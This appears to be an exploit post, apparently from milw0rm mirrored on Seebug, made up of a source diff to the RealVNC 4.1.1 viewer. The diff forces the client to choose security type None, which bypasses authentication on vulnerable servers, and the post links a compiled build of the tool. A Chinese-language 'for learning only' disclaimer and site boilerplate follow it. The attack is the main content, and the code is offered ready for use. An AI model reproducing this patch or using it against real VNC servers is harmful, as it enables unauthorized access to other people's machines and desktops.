xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx --- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx 2005-03-11 09:08:41.000000000 -0600 +++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx 2006-05-15 14:03:30.000000000 -0500 @@ -183,7 +183,12 @@ // Inform the server of our decision if (secType != secTypeInvalid) { - os->writeU8(secType); + + // [BL4CK] In response to the VNC Null Authentication + // force a secType to equal secTypeNone + // http://blacksecurity.org + secType = secTypeNone; + os->writeU8(secTypeNone); os->flush(); vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } Compiled: http://www.milw0rm.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar // milw0rm.com [2006-05-16]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论